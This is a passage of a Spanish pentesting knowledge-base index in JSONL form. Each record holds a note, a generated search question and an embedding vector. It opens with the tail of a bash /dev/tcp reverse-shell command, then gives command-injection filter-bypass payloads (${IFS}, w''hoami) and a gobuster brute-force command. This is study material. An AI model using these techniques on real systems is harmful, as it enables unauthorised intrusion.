0>&1'\n```\nβ†’ recΓ­bela en tu listener (Reverse shell, ojo al Egress filtering).", "indexar": "cΓ³mo conectarme desde una vΓ­ctima usando bash y /dev/tcp?", "v": [-0.05079, 0.06014, -0.19566, -0.08549, 0.01323, -0.03891, -0.07313, 0.04477, 0.03556, 0.04895, -0.12335, -0.01811, -0.10559, 0.03397, -0.05372, -0.05214, 0.04243, -0.00889, 0.16385, -0.15621, 0.03776, 0.01043, -0.03114, 0.01473, -0.02271, 0.04277, 0.01775, -0.05013, -0.12213, -0.03353, 0.02733, -0.19925, -0.01422, 0.09325, 0.02234, -0.0111, -0.02278, 0.02968, 0.04183, 0.15813, 0.01951, -0.08541, -0.15655, 0.04256, 0.15261, -0.07718, 0.03712, -0.09929, 0.08476, -0.04304, -0.16539, -0.01338, -0.21783, -0.11173, -0.08322, 0.00274, 0.08268, -0.1065, 0.12856, -0.03681, -0.07594, 0.03981, -0.02859, 0.02123, 0.05214, -0.08382, -0.00948, -0.07073, -0.15922, 0.05532, 0.01713, 0.09468, -0.06787, 0.03955, 0.1452, 0.01923, -0.00527, -0.03466, 0.10566, -8e-05, -0.02757, -0.06963, -0.02786, 0.02591, -0.11617, -0.0021, 0.10224, 0.06229, -0.00278, -0.05146, 0.06777, 0.00704, -0.00128, -0.02124, 0.04514, -0.14513, 0.00071, -0.09787, 0.00325, -0.05793, 0.08531, 0.03303, -0.0494, 0.14197, 0.03349, -0.10625, 0.0401, 0.00614, -0.08451, -0.02764, 0.0264, 0.05612, 0.048, -0.10356, -0.07056, -0.12243, -0.02861, -0.06798, 0.0083, 0.04835, -0.03395, 0.01714, 0.04069, -0.01522, -0.02914, 0.03252, -0.00269, 0.09534, -0.01499, 0.01261, 0.06206, 0.02229, 0.04696, -0.05521, -0.01257, 0.0659, 0.0288, -0.06531, -0.08484, -0.05047, 0.04623, 0.04922, -0.04314, -0.03968, 0.0439, -0.02021, -0.01137, -0.07186, -0.08136, 0.05118, 0.06699, 0.0166, -0.10758, -0.01352, -0.05867, -0.03376, -0.00496, -0.08591, 0.02171, 0.06456, 0.00713, 0.00558, -0.05033, 0.01527, 0.01397, -0.01804, -0.01648, 0.01228, 0.11179, 0.04937, 0.05611, 0.02779, 0.01116, -0.00108, 0.0002, -0.13113, 0.0003, -0.06765, 0.00778, 0.00022, 0.00792, -0.00065, 0.01414, -0.04444, 0.03458, 0.04755, 0.0127, -0.02431, 0.00297, 0.02533, -0.00553, 0.01661, -0.03543, 0.02949, 0.02261, -0.08583, -0.04861, -0.01862, -0.0366, 0.03797, -0.08232, 0.04898, 0.05342, -0.04982, 0.05066, 0.01577, -0.03085, -0.06631, -0.01601, 0.02218, 0.06067, 0.00902, 0.04788, -0.03564, -0.01529, -0.00449, 0.01489, -0.04658, 0.05395, 0.01266, -0.05628, 0.00262, -0.02253, -0.00573, 0.00967, -0.00147, 0.00549, 0.00012, -0.03055, -0.00798, -0.01568, 0.03827, -0.00561, -0.04336, 0.02122, -0.03912, -0.04494, -0.02495, -0.06595, -0.03405, 0.01878, 0.05327, -0.01965, -0.01026, 0.0105, -0.01989, -0.07285, 0.01681, -0.03637, -0.05211, -0.01642, -0.02157, 0.07628, -0.07435, -0.0569, -0.04578]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de filtros\n- Espacios filtrados β†’ `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas β†’ `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal Β· Reverse shell Β· OSCP MOC", "indexar": "que tecnica sirve para eludir filtros de palabras en un sistema?", "v": [0.00677, -0.03923, -0.11501, -0.21912, -0.03826, -0.16462, -0.04601, -0.14048, 0.06241, -0.04905, -0.07224, -0.02626, 0.06696, 0.00037, 0.11576, -0.09071, 0.13468, -0.15592, 0.08239, -0.06567, -0.094, -0.04328, -0.17983, -0.13182, -0.0482, -0.0505, 0.0414, -0.09287, -0.13092, 0.06506, 0.041, 0.12662, 0.14011, -0.12325, -0.07482, 0.06329, -0.02221, 0.10327, 0.01047, 0.09199, -0.02097, -0.05274, 0.03239, 0.05017, 0.0186, -0.02835, 0.06911, -0.03932, 0.01289, -0.00491, -0.1004, -0.0164, 0.03999, 0.03032, -0.03442, -0.14628, 0.0812, -0.01475, 0.01125, -0.08204, -0.06374, 0.0677, 0.08917, -0.02165, 0.02044, -0.04253, -0.02556, -0.02821, -0.01066, 0.07379, -0.00805, 0.00382, 0.08211, 0.0418, -0.03592, 0.07103, 0.06608, 0.03674, 0.04218, -0.0652, 0.00386, 0.01133, -0.16106, 0.00139, 0.02479, -0.02139, 0.04128, -0.03792, -0.06405, -0.15174, -0.0959, -0.04166, 0.13407, 0.00486, 0.0756, 0.01788, -0.04876, 0.02821, -0.02719, 0.01217, 0.11054, -0.15611, -0.03715, 0.03258, -0.12233, -0.03063, 0.14791, -0.04714, 7e-05, -0.11737, 0.04428, 0.04607, -0.00973, -0.06457, -0.0314, 0.00168, -0.00392, -0.07742, -0.07339, -0.01795, -0.02365, -0.00037, 0.00045, -0.05321, 0.09364, 0.01327, -0.01896, -0.04326, 0.03987, 0.04981, 0.05385, 0.04894, -0.04698, -0.00731, -0.01344, -0.02385, 0.04288, 0.02023, -0.02827, -0.0144, -0.05669, 0.09863, -0.14285, -0.06974, 0.02535, -0.02375, 0.07795, -0.04872, -0.01704, -0.07766, 0.01835, -0.0217, 0.05066, 0.02631, -0.02739, -0.01872, 0.04857, -0.03252, -0.02031, -0.01376, 0.04633, -0.00463, -0.02532, 0.00327, 0.0243, 0.03546, -0.04457, -0.08064, 0.02927, 0.04718, -0.00152, -0.0456, 0.11915, 0.0057, -0.01053, 0.0761, -0.01635, -0.0216, -0.03749, -0.06011, -0.05801, -0.02505, -0.06348, -0.02078, 0.04064, 0.02144, -0.01935, 0.02996, -0.05796, -0.01093, -0.00806, 0.00944, -0.11049, -0.00716, -0.02946, -0.00443, -0.03007, -0.03641, 0.0161, -0.08791, 0.00343, 0.05542, 0.07546, -0.02604, 0.00674, 0.07036, 0.0938, -0.07265, 0.04071, 0.05245, -0.06983, 0.06122, -0.04371, 0.00159, -0.08153, 0.02356, 0.02119, 0.05993, 0.06067, -0.02053, 0.06943, -0.03272, -0.02435, 0.02392, -0.01958, -0.05484, -0.05583, 0.03096, 0.04601, -0.04415, -0.03656, -0.0965, 0.00465, 0.00267, -0.02022, -0.0428, -0.02317, 0.0214, 0.01412, -0.069, 0.02809, -0.00189, 0.01121, -0.04629, -0.00509, -0.01654, -0.03647, -0.0708, 0.0032, -0.01055, -0.04394, -0.01203, -0.04369, -0.00669, 0.04927, 0.00071]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de filtros\n- Espacios filtrados β†’ `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas β†’ `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal Β· Reverse shell Β· OSCP MOC", "indexar": "como puedo usar variables para pasar caracteres que estan bloqueados?", "v": [0.21429, 0.04464, -0.12798, -0.10129, -0.11393, -0.04975, 0.07787, -0.14576, 0.02642, -0.10996, 0.00661, -0.11304, -0.05584, 0.01955, 0.04882, 0.04418, 0.00622, -0.13099, 0.02529, -0.03397, 0.07084, -0.19157, -0.06224, 0.02057, -0.07227, 0.09164, -0.12841, -0.06322, -0.22382, -0.07108, -0.05044, 0.03381, 0.10187, -0.05353, -0.0705, -0.00437, -0.02567, 0.01616, 0.07638, 0.14113, 0.07938, -0.08469, -0.00814, -0.09966, 0.02672, 0.04162, -0.0633, 0.07444, -0.01508, -0.06797, 0.06217, -0.06541, -0.09928, 0.04754, 0.08464, -0.00488, 0.2186, -0.00534, -0.11145, 0.00581, -0.10904, 0.00895, 0.11521, 0.08657, -0.00913, -0.01458, 0.02571, -0.0137, -0.08371, 0.05358, 0.05159, 0.09847, -0.03525, -0.04465, 0.14459, 0.10965, -0.00194, -0.07676, 0.09129, 0.04142, -0.06245, 0.01156, 4e-05, 0.03714, 0.01178, -0.03682, -0.00405, -0.09216, 0.015, -0.02608, 0.1023, 0.04908, -0.01162, 0.03732, -0.07282, -0.02067, 0.00743, 0.09905, 0.00674, -0.05603, 0.07705, 0.02086, -0.0318, 0.07007, 0.05845, -0.03526, 0.07379, -0.072, -0.02427, -0.09363, 0.03835, -0.05052, -0.00416, -0.07142, -0.03102, 0.00715, -0.0197, -0.00691, -0.04978, -0.08905, -0.04322, -0.07142, -0.0791, 0.01353, 0.03337, 0.08185, 0.02653, 0.00445, 0.00506, 0.01406, -0.08148, 0.03909, -0.04889, -0.09385, -0.10667, 0.07512, 0.06066, -0.05289, -0.00791, 0.03175, 0.02849, 0.05223, 0.04788, 0.01887, 0.08408, 0.01801, -0.03381, -0.06611, -0.12445, -0.013, 0.08573, -0.00906, -0.03383, 0.09111, -0.07054, -0.06824, 0.03735, -0.06195, -0.00521, 0.01463, -0.03262, 0.00317, -0.08028, 0.08764, -0.01981, -0.05647, -0.00191, -0.04553, 0.06528, -0.00865, -0.02753, 0.0426, 0.08041, -0.06633, -0.0017, -0.0218, -0.0158, -0.02489, -0.03109, -0.01868, -0.03756, 0.02703, -0.02939, -0.05898, -0.04692, 0.0683, 0.02408, -0.02265, -0.02156, 0.00807, -0.0157, 0.08319, 0.00462, -0.05049, -0.01695, 0.00702, -0.00694, 0.01303, -0.00261, -0.06988, 0.00632, 0.07525, -0.02797, -0.05793, 0.06888, 0.01878, -0.08497, 0.05391, 0.03077, -0.00476, 0.05649, -0.04452, 0.0531, 0.02016, -0.01549, -0.02496, -0.06146, 0.00031, 0.01713, -0.05772, 0.00777, 0.07588, 0.02739, 0.06467, 0.00162, 0.01416, 0.02416, -0.00435, 0.02848, 0.05876, -0.0469, 0.04779, -0.01463, 0.03402, -0.01055, 0.04289, -0.04603, 0.02189, -0.00259, -0.02605, 0.02053, 0.05032, -0.04184, -0.05305, 0.00108, -0.05725, -0.08713, 0.04284, -0.05312, -0.0587, -0.00643, 0.01772, 0.02098, -0.03412, 0.00215, -0.01831]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de filtros\n- Espacios filtrados β†’ `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas β†’ `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal Β· Reverse shell Β· OSCP MOC", "indexar": "cual es una metodo para evadir los espacios filtrados al ejecutar comandos?", "v": [0.1343, -0.05256, -0.11841, -0.0685, 0.01207, -0.04341, 0.11133, -0.04469, -0.12407, -0.09554, -0.0923, -0.03241, 0.09746, -0.03584, 0.07513, -0.00466, 0.31444, -0.01787, -0.01874, -0.07565, -0.03381, -0.04628, -0.12521, -0.05763, -0.02576, 0.07632, -0.03211, 0.07684, -0.11287, -0.01161, -0.0103, 0.15481, 0.11891, -0.09067, -0.02532, 0.12415, -0.04469, 0.0093, -0.12032, 0.13724, -0.11573, 0.06188, -0.12295, -0.05918, -0.04866, -0.172, 0.01804, -0.02243, 0.06355, 0.05561, -0.00754, 0.00363, -0.12383, 0.02676, -0.11302, -0.11993, 0.06336, -0.10267, -0.06991, 0.03837, -0.01529, -0.07404, 0.12628, 0.11722, -0.02455, -0.0374, 0.02055, -0.05628, -0.02965, 0.10374, 0.0224, 0.0417, -0.02853, 0.05894, 0.03531, -0.09303, -0.01656, -0.0341, 0.08454, 0.02719, -0.0868, -0.00705, -0.09916, -0.00969, -0.12413, -0.06131, -0.10249, -0.05253, -0.04176, -0.02123, -0.10293, -0.06268, 0.01115, -0.00111, 0.06594, -0.03019, 0.03673, 0.06923, 0.02909, 0.03775, 0.06272, -0.04811, -0.14581, 0.13044, 0.04836, 0.03018, -0.04395, -0.0097, 0.00271, -0.0483, -0.02196, -0.02279, 0.00044, -0.04372, -0.03591, -0.06213, 0.04205, -0.06143, -0.02716, -0.08122, -0.1599, 0.07799, -0.10911, 0.00665, 0.05332, -0.04447, 0.01985, 0.00358, 0.03895, -0.00397, -0.04423, 0.00675, 0.06432, -0.0019, -0.02335, 0.03433, 0.05569, 0.01476, -0.09005, -0.13831, 0.00199, -0.00514, 0.02673, 0.01476, 0.05686, -0.00557, 0.08301, -0.11413, -0.03845, -0.03423, 0.04227, 0.04208, -0.07482, 0.02062, -0.0417, -0.04474, -0.06868, -0.00366, -0.08952, 0.04054, -0.00369, 0.03725, -0.02387, 0.00743, 0.04854, -0.0588, -0.02922, -0.0423, -0.03605, 0.01152, 0.04561, 0.02357, -0.02568, -0.01329, -0.00989, -0.01668, -0.00404, -0.03905, 0.01442, 0.10287, 0.04679, 0.07253, -0.0211, -0.03244, 0.03451, -0.03229, -0.00798, 0.00484, -0.02085, 0.06118, -0.00955, 0.03305, -0.02664, -0.08655, -0.01304, -0.00152, 0.03679, -0.01216, -0.0202, -0.01998, -0.07022, 0.08128, 0.05929, -0.01923, 0.00573, 0.03419, 0.01284, 0.00268, -0.03314, 0.02184, -0.00103, 0.00806, 0.01474, -0.00368, -0.05809, 0.00278, -0.02725, -0.04893, -0.00651, 0.01927, 0.0204, 0.00485, 0.05683, -0.06394, -0.00757, 0.00985, -0.00393, -0.02817, -0.01936, 0.0111, -0.00683, -0.04895, -0.00487, -0.02679, 0.02226, 0.04493, 0.01511, -0.02103, -0.00759, -0.06872, 0.04037, 0.03064, 0.03935, -0.05091, 0.03365, -0.00649, -0.10846, -0.01537, 0.00338, -0.02641, 0.04241, -0.01379, -0.03267, -0.00711, 0.01103, -0.03799]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Content discovery\n\n> Descubrir rutas, ficheros y endpoints ocultos por fuerza bruta. El paso que mΓ‘s vectores destapa en Hacking web. Complementa EnumeraciΓ³n web.", "indexar": "que herramienta sirve para descubrir archivos ocultos usando fuerza bruta", "v": [0.1562, -0.07151, -0.26546, -0.14331, -0.01416, -0.05452, -0.06797, -0.00775, 0.05098, -0.17661, -0.08447, -0.07124, -0.02674, 0.12213, -0.03162, -0.09161, 0.08, -0.14437, -0.08078, -0.06401, 0.00367, -0.04839, 0.0016, -0.1368, -0.10503, -0.09241, -0.00892, 0.09448, -0.13153, 0.00189, 0.00724, 0.16193, 0.1359, -0.05502, -0.08565, 0.01429, -0.07184, -0.03253, 0.04787, 0.07213, -0.00506, 0.08849, -0.07923, 0.10363, -0.00819, 0.04343, -0.07569, 0.0489, -0.05783, 0.11156, -0.10492, -0.17158, -0.14773, -0.00836, -0.06284, -0.20339, 0.02347, -0.09019, -0.06256, 0.00493, -0.08132, 0.04095, -0.05533, -0.05828, -0.04488, -0.06901, -0.03939, 0.00526, -0.08279, 0.02852, -0.09025, 0.03472, 0.09483, 0.00586, -0.06676, -0.00376, 0.05581, -0.00382, -0.01795, -0.02045, 0.0117, 0.02825, -0.11737, -0.00161, -0.08281, -0.08648, 0.08721, 0.01327, -0.04786, -0.07941, 0.00163, 0.04516, -0.04318, 0.02036, 0.01584, 0.0409, 0.06894, -0.02295, -0.00158, -0.03411, 0.08578, -0.08388, -0.07686, 0.00949, 0.07976, 0.02913, -0.05598, -0.016, -0.06138, 0.0472, 0.08224, 0.00387, -0.01268, 0.07961, -0.01617, 0.10014, 0.00473, -0.11117, -0.03553, -0.04754, -0.01144, 0.03644, -0.07795, 0.04902, -0.00649, -0.03519, 0.0062, 0.07142, 0.00616, -0.10325, 0.05606, -0.01908, -0.04917, 0.0527, -0.05028, -0.05366, 0.06654, -0.05194, -0.05239, -0.0845, 0.07628, -0.01261, -0.03267, -0.06403, 0.08809, 0.05658, 0.05493, 0.00344, 0.00579, -0.06168, 0.02856, -0.08914, 0.03443, 0.02954, -0.02579, 0.00609, 0.01888, -0.09233, -0.15843, -0.00308, -0.08472, -0.04707, -0.09835, -0.01702, -0.02397, -0.04996, -0.01981, -0.01037, 0.04619, -0.00544, 0.06144, -0.04541, 0.08377, 0.01201, -0.01357, -0.03179, -0.03187, 0.0209, 0.01686, -0.01553, 0.00362, 0.01775, -0.01873, 0.01782, -0.01156, -0.00495, 0.10082, -0.08682, -0.02995, 0.00661, 0.00724, 0.01078, -0.01889, -0.02139, -0.03613, -0.03853, -0.02774, 0.00765, 0.05243, -0.02473, 0.01173, -0.02141, -0.018, 0.00794, 0.0447, 0.00196, -0.00501, -0.01615, 0.01916, -0.00244, 0.01862, -0.02092, 0.03919, -0.06708, 0.02145, -0.02136, -0.06592, 0.02099, -0.01195, -0.00617, -0.02329, 0.02862, 0.03327, -0.00386, 0.01074, 0.02591, 0.00547, -0.05059, -0.00949, 0.00052, 0.01027, -0.03856, -0.05149, 0.05462, -0.01172, -0.05789, 0.01976, 0.04047, -0.07072, 0.0006, -0.00073, 0.06052, 0.02794, -0.03558, -0.04829, -0.03182, 0.02828, -0.02621, -0.01216, -0.01317, -0.01639, 0.05245, 0.08003, -0.02137, 0.02111, -0.02759]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Content discovery\n\n> Descubrir rutas, ficheros y endpoints ocultos por fuerza bruta. El paso que mΓ‘s vectores destapa en Hacking web. Complementa EnumeraciΓ³n web.", "indexar": "con quΓ© puedo encontrar rutas y endpoints ocultos de una pΓ‘gina web", "v": [0.19373, 0.04939, -0.12424, 0.02971, 0.12107, -0.00274, -0.01664, -0.04175, 0.02405, -0.06382, -0.16081, -0.16203, -0.03613, -0.00981, 0.00345, 0.03077, -0.00119, -0.0275, 0.07528, -0.03628, -0.07738, -0.16322, -0.09406, 0.02622, -0.02878, -0.0261, 0.13026, 0.09006, -0.01022, 0.00654, 0.00324, 0.07548, -0.06271, 0.0613, -0.08733, 0.01452, 0.09687, 0.13378, 0.01367, -0.10168, 0.01225, -0.05967, -0.066, 0.02876, 0.08769, 0.01653, -0.06996, -0.02904, 0.00866, -0.01251, -0.03376, -0.1479, -0.28576, -0.05981, 0.04933, -0.0296, 0.14682, 0.00032, 0.10853, -0.00548, -0.00492, 0.03855, -0.03781, 0.01959, 0.02555, -0.08286, -0.02586, 0.04875, 0.0243, -0.0081, -0.01832, -0.02059, 0.06872, -0.05247, 0.09763, 0.03513, 0.0111, 0.02158, 0.03349, 0.07299, 0.01754, 0.01727, -0.09871, 0.03935, -0.0646, -0.09896, -0.04446, 0.06935, -0.03405, -0.13159, 0.05529, 0.08991, -0.06729, -0.01006, -0.13556, -0.07802, 0.02437, 0.03053, -0.00722, -0.09621, -0.0668, 0.04148, -0.13138, 0.07949, 0.00015, 0.03946, -0.00464, -0.00983, -0.0253, 0.06534, 0.09005, -0.03307, -0.03223, -0.06903, 0.0394, 0.02508, 0.01276, 0.06508, 0.01764, -0.13569, -0.0936, -0.02551, -0.0669, 0.01932, 0.02236, 0.03378, -0.03738, 0.09612, 0.03839, -0.03116, -0.00752, -0.04491, -0.05333, -0.05043, 0.00915, 0.01023, 0.05087, 0.01121, 0.01946, -0.02669, 0.05873, -0.13594, -0.12947, -0.01876, 0.05329, -0.06341, 0.01288, -0.03119, -0.07911, -0.0611, -0.01564, 0.02746, 0.01673, 0.02129, 0.00533, 0.06082, -0.01661, -0.00807, -0.01706, 0.02607, -0.02269, 0.11133, -0.04041, 0.01215, 0.04892, 0.00746, -0.11718, 0.00452, -0.00595, -0.03983, 0.00507, 0.06331, 0.00407, -0.14807, 0.00025, -0.03699, -0.06591, -0.05228, 0.12592, -0.0002, -0.00556, 0.03037, 0.02411, 0.00545, -0.04166, -0.03625, 0.08921, -0.06762, 0.00122, 0.041, 0.02822, -0.02842, -0.04095, 0.02653, -0.00403, -0.01365, 0.01078, 0.05082, 0.04658, -0.09, -0.03985, -0.00607, -0.02126, -0.03365, -0.04704, -0.00172, -0.0179, -0.0369, -0.00146, 0.02089, 0.03686, -0.0785, 0.00992, -0.09379, 0.01526, -0.04224, 0.03129, -0.05118, -0.06242, 0.02539, 0.06092, 0.03336, -0.04147, -0.03776, 0.10976, 0.01036, -0.00214, 0.0051, -0.00357, 0.05154, -0.05668, -0.02577, -0.07014, -0.04577, 0.06431, -0.06518, -0.00938, 0.04397, -0.02879, 0.04469, 0.00205, 0.04971, 0.05136, -0.04974, 0.01215, -0.09432, -0.06944, 0.00088, 0.02323, -0.06968, -0.09296, -0.01007, 0.05375, -0.00428, 0.01248, -0.04801]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Content discovery\n\n> Descubrir rutas, ficheros y endpoints ocultos por fuerza bruta. El paso que mΓ‘s vectores destapa en Hacking web. Complementa EnumeraciΓ³n web.", "indexar": "cual programa me ayuda a hacer un descubrimiento exhaustivo de ficheros escondidos", "v": [0.22802, 0.00903, -0.20645, -0.01667, 0.1349, -0.02376, -0.04047, -0.00322, -0.12257, -0.08119, -0.03936, -0.03394, -0.12897, 0.01778, 0.08957, -0.09961, 0.15971, 0.0364, 0.07368, 0.00904, 0.00131, 0.01688, -0.09061, -0.05475, -0.00167, -0.06337, -0.01097, 0.0187, -0.04896, -0.04774, 0.07023, 0.14059, -0.04173, 0.02062, -0.05452, 0.08875, 0.04413, -0.11668, -0.06383, -0.02267, -0.00246, -0.10021, -0.03661, 0.02878, -0.05653, -0.07492, -0.03039, 0.01419, 0.03116, 0.03164, 0.01945, -0.0747, -0.06239, -0.06389, 0.03493, -0.10984, 0.0833, -0.068, -0.03149, 0.11287, -0.05395, -0.07206, 0.07156, 0.01476, 0.04051, -0.09356, 0.07771, -0.00874, 0.01648, 0.01082, -0.02131, 0.06525, 0.09324, -0.01363, -0.0453, 0.03692, -0.02341, -0.04146, 0.06328, 0.00129, -0.04326, 0.02246, 0.0179, 0.00905, -0.06199, -0.08688, 0.05839, 0.02129, -0.12247, -0.11084, -0.00318, 0.00482, -0.12623, 0.14387, 0.05726, 0.01583, 0.13584, 0.01174, -0.03066, 0.07228, 0.0306, -0.05892, -0.11762, 0.04624, 0.02356, 0.10181, 0.02371, 0.00418, -0.12708, -0.03749, 0.0553, -0.0084, -0.01122, -0.04826, -0.05035, 0.05998, 0.09289, 0.00505, 0.01049, -0.19136, -0.14933, 0.01811, -0.03777, 0.04889, 0.04169, -0.0695, -0.04774, 0.07904, 0.02015, 0.04299, -0.03827, -0.01316, -0.08774, -0.02362, -0.03931, -0.00428, -0.02668, 0.0111, -0.03767, 0.03098, 0.12937, -0.04467, 0.01642, -0.01422, 0.06497, -0.0117, 0.06978, 0.02952, -0.0396, -0.04407, -0.07025, 0.03844, 0.02358, 0.02143, -0.0065, -0.02666, 0.04637, 0.01006, -0.03649, -0.01755, -0.0217, 0.05976, -0.02146, -0.09903, 0.04902, -0.04816, 0.02067, -0.01819, 0.0422, 0.0618, -0.01597, -0.01484, 0.02474, -0.0902, 0.02319, -0.03127, 0.00321, -0.08755, 0.08154, -0.01548, -0.08391, 0.05116, 0.047, -0.00609, -0.07259, -0.02878, 0.0251, -0.12487, 0.00589, -0.00397, 0.02257, 0.0185, -0.02713, 0.00453, -0.11106, -0.08316, 0.04782, -0.03405, 0.09716, -0.03177, -0.00838, -0.00959, -0.03695, -0.05754, -0.04839, 0.04046, -0.09669, -0.04757, -0.0164, 0.01135, 0.06975, -0.03323, 0.12866, 0.00692, -0.06358, -0.03098, -0.05036, 0.04238, 0.0047, -0.01733, 0.02597, -0.01643, 0.09316, 0.01864, 0.03972, -0.04273, 0.09117, 0.07842, -0.01109, 0.02184, -0.05499, -0.03545, 0.0042, -0.02813, 0.07697, 0.01061, -0.03815, -0.01785, -0.0082, -0.05054, 0.02769, 0.08679, 0.03521, -0.05662, 0.0343, -0.03323, -0.00175, 0.05945, 0.04578, -0.0105, -0.02804, 0.05353, 0.10308, -0.05519, 0.09603, -0.0097]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# gobuster (rΓ‘pido, directo)\ngobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html", "indexar": "que herramienta sirve para escanear directorios de un servidor web rΓ‘pidamente?", "v": [0.02262, -0.04477, -0.22113, -0.17396, -0.01493, -0.17265, -0.06177, -0.1487, 0.10031, 0.02966, -0.09115, -0.04792, -0.00679, -0.21186, 0.06477, 0.07321, 0.1761, -0.11778, 0.04981, 0.0542, 0.0215, 0.08987, -0.02807, 0.01394, -0.13901, 0.00317, -0.01627, -0.02279, -0.19206, 0.05152, -0.01011, 0.02866, 0.05016, -0.02515, -0.07033, -0.05411, -0.00919, 0.06051, -0.04715, 0.08942, 0.01998, 0.01289, -0.12585, -0.00239, -0.05113, -0.00343, 0.03198, -0.01711, 0.07663, 0.08003, -0.04495, -0.149, -0.12153, 0.03991, -0.0398, -0.03651, 0.15392, -0.15217, 0.05995, -0.08584, -0.17394, -0.01057, -0.06744, -0.05585, -0.00749, -0.00128, -0.01497, -0.07677, -0.08197, -0.03977, -0.11614, 0.07712, 0.1007, -0.03088, 0.00342, -0.02158, -0.00796, 0.05341, 0.00622, 0.06521, 0.10352, -0.00029, -0.07371, 0.06452, -0.12917, -0.07337, 0.03644, -0.03874, 0.08742, -0.05454, 0.03306, 0.12691, -0.08698, 0.06729, 0.05726, -0.04464, 0.11507, -0.06037, 0.02633, -0.02963, 0.11365, -0.03772, -0.10761, 0.05766, 0.03625, 0.09307, 0.03941, -0.00397, -0.07818, 0.03977, 0.09169, 0.00782, -0.01472, -0.01772, -0.04516, 0.01238, -0.00011, 0.00702, 0.03235, 0.01767, -0.00755, -0.01139, -0.03119, 0.03841, -0.04106, -0.03002, 0.05382, 0.00195, 0.0072, -0.07284, -0.03296, -0.08562, -0.11037, 0.03265, -0.03128, 0.00426, 0.05846, -0.11232, 0.00272, -0.06759, 0.01991, -0.01266, -0.07623, -0.02792, 0.04405, -0.01261, 0.08856, -0.06319, -0.04446, -0.02607, 0.03201, -0.06612, -0.07833, -0.01377, -0.08902, -0.03369, -0.01625, -0.00513, -0.10267, 0.02279, -0.00664, -0.02417, 0.09267, 0.08671, -0.03958, -0.04858, 0.0033, 0.0604, 0.05276, 0.0365, 0.03156, 0.04978, 0.01496, -0.08087, 0.01032, -0.01153, -0.0728, -0.0341, 0.00789, -0.00865, -0.0149, -0.01196, -0.04651, 0.01753, -0.04067, -0.04745, 0.01819, -0.03569, -0.04038, 0.04899, 0.03419, 0.02151, -0.02216, -0.0208, 0.0395, 0.00084, -0.02287, -0.04386, 0.01712, -0.05752, -0.05031, -0.0217, -0.01966, -0.0525, -0.01094, 0.00938, -0.00656, -0.03298, 0.0041, 0.01318, -0.01571, 0.01497, 0.07492, -0.02048, 0.01605, -0.02189, 0.07477, -0.00225, -0.02385, -0.04931, -0.01869, -0.04152, 0.00936, 0.01058, -0.00818, 0.04249, 0.00693, -0.04327, 0.02391, -0.02876, -0.01714, -0.0436, -0.02547, -0.02389, 0.02013, -0.06128, 0.02236, -0.02527, -0.05203, -0.01293, -0.01642, 0.0654, -0.01756, -0.01053, -0.02145, -0.08101, 0.01094, -0.05949, -0.04461, -0.03445, -0.0211, -0.04799, 0.01722, -0.03087, -0.00958, -0.01411]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# gobuster (rΓ‘pido, directo)\ngobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html", "indexar": "cual programa me ayuda a descubrir carpetas ocultas en una pΓ‘gina web?", "v": [0.179, 0.07258, -0.1526, -0.08602, 0.00771, -0.13003, 0.03203, 0.06384, -0.07207, -0.08457, -0.10459, -0.16106, -0.12271, -0.00833, -0.00618, -0.01824, 0.16933, -0.02534, 0.12881, -0.04876, 0.05629, -0.01611, -0.06523, -0.07193, -0.14777, -0.02327, 0.12549, 0.03253, -0.01459, -0.04869, -0.02872, 0.06718, -0.07241, 0.01783, -0.06917, 0.04664, -0.01322, -0.11037, -0.0138, -0.03931, 0.05373, -0.0144, 0.01005, 0.10392, 0.06115, 0.01912, -0.0482, -0.04125, -0.04242, -0.02502, -0.09734, -0.09549, -0.10956, -0.07692, 0.00981, -0.19294, 0.10433, -0.10711, 0.00591, 0.02756, 0.03011, 0.03109, -0.05158, 0.01196, 0.00855, -0.08781, 0.04007, -0.0016, -0.0108, 0.0929, -0.02846, 0.0525, 0.13429, -0.03833, -0.03049, -0.03447, 0.01475, -0.11618, 0.03579, -0.0527, 0.0393, 0.08188, -0.01612, 0.13623, -0.07834, -0.06218, -0.03815, 0.03953, -0.08864, -0.15077, 0.06319, 0.01221, -0.10466, 0.05932, -0.00656, -0.07914, 0.12384, 0.03631, 0.02463, -0.00761, -0.04718, -0.06809, -0.14849, 0.05231, -0.01315, 0.11021, -0.04871, -0.05695, -0.10195, 0.02104, 0.08448, 0.04799, -0.0316, -0.05843, -0.0493, 0.01978, 0.04253, 0.02799, 0.01933, -0.10396, -0.12441, 0.02228, -0.06641, 0.06892, 0.1032, -0.00894, 0.02126, 